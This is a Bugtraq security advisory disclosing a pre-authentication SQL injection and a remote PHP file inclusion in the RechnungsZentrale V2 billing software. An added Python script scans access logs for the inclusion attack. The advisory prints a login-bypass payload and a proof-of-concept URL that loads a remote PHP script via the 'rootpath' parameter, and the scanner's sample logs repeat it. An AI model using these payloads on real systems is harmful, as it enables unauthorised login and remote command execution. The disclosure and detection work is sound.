Bugtraq mailing list archives

RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities
From: info () g-0 org
Date: 19 Apr 2006 07:40:03 -0000

    ----------------------------------------------------------------------------------
    - GroundZero Security Research and Software Development 2006                     - 
    ----------------------------------------------------------------------------------
    -                                                                                -
    -  Security Advisory regarding RechnungsZentrale v2.                             -
    -  SQL Injection and Remote File inclusion Vulnerabilities.                      -
    -  Released: Tue Apr 18 18:00:00 CEST 2006                                       -
    -                                                                                -
    ----------------------------------------------------------------------------------



    ----------------------------------------------------------------------------------
    - Affected:                                                                      -
    ----------------------------------------------------------------------------------

    Software:   RechnungsZentrale V2
    Version:    1.1.3; older versions are likely affected as well.
    Vendor:     http://www.nfec.de/


    ----------------------------------------------------------------------------------
    - Information:                                                                   -
    ----------------------------------------------------------------------------------

    "RechnungsZentrale V2 is a multiuser, Web-based billing application. 
     It facilitates the creation of bills and the management of customers. 
     It is written in PHP and uses MySQL. It supports German, English, French, 
     and Dansk languages."

    The Software contains vulnerabilities which allow an Attacker to conduct
    SQL injection and Remote File inclusion Attacks prior to Authentication.

    The SQL injection vulnerability exists in the login script (authent.php4) and 
    allows an Attacker to log into the internal Interface or execute malicious 
    SQL commands.

    PoC:
        User: ' OR '1'='1
        Password: 1


    In the same script it is possible to include a remote PHP file by pointing the 
    "rootpath=" parameter to a remote PHP script that calls system() or passthru().
   
    Doing so would allow an unauthenticated Attacker to execute shell commands with 
    permissions of the Web Server. 

    PoC: 
        http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4


    ----------------------------------------------------------------------------------
    - Vendor Response:                                                               -
    ----------------------------------------------------------------------------------

    Notified:   Tue Apr 18 16:12:14 CEST 2006
    Response:   Tue Apr 18 17:13:14 CEST 2006 
                (Development Discontinued)
    Disclosure: Tue Apr 18 18:00:00 CEST 2006


    ----------------------------------------------------------------------------------
    - Bugs discovered by GroundZero Security Research and Software Development       -
    - http://www.GroundZero-Security.com | Http://www.g-0.org                        -
    ----------------------------------------------------------------------------------
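
Added example, not part of the original advisory or the vendor's code: with development discontinued, one defensive step is to search web server logs for requests to authent.php4 whose "rootpath" value is a URL. It assumes combined-format access logs; the function name, sample lines and client addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any URL scheme, matched case-insensitively: the PoC above writes "Http://",
# which a case-sensitive search for "http://" would miss.
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def flag_requests(log_lines):
    """Return (client, target) for authent.php4 requests whose rootpath is a URL."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        target = m.group(1)
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/authent.php4"):
            continue
        # parse_qsl percent-decodes once, so the value is checked in the form
        # the script would receive it (http%3A%2F%2F... becomes http://...).
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == "rootpath" and REMOTE.match(value):
                hits.append((line.split(" ", 1)[0], target))
                break
    return hits


# Constructed sample lines: documentation addresses, placeholder hosts as in the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Apr/2006:09:00:01 +0200] "GET /mod/authent.php4 HTTP/1.1" 200 512',
    '198.51.100.7 - - [19/Apr/2006:09:00:05 +0200] '
    '"GET /mod/authent.php4?rootpath=Http://server.tld/mod/db.php4 HTTP/1.1" 200 87',
    '203.0.113.5 - - [19/Apr/2006:09:00:09 +0200] '
    '"GET /mod/authent.php4?rootpath=http%3A%2F%2Fserver.tld%2Fmod%2Fdb.php4 HTTP/1.1" 200 87',
    '192.0.2.10 - - [19/Apr/2006:09:00:12 +0200] "POST /mod/authent.php4 HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for client, target in flag_requests(SAMPLE_LOG):
        print(f"remote rootpath from {client}: {target}")
```

The check only sees query strings; a rootpath value or login input sent in a POST body does not appear in an access log and needs request-body logging to be visible.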

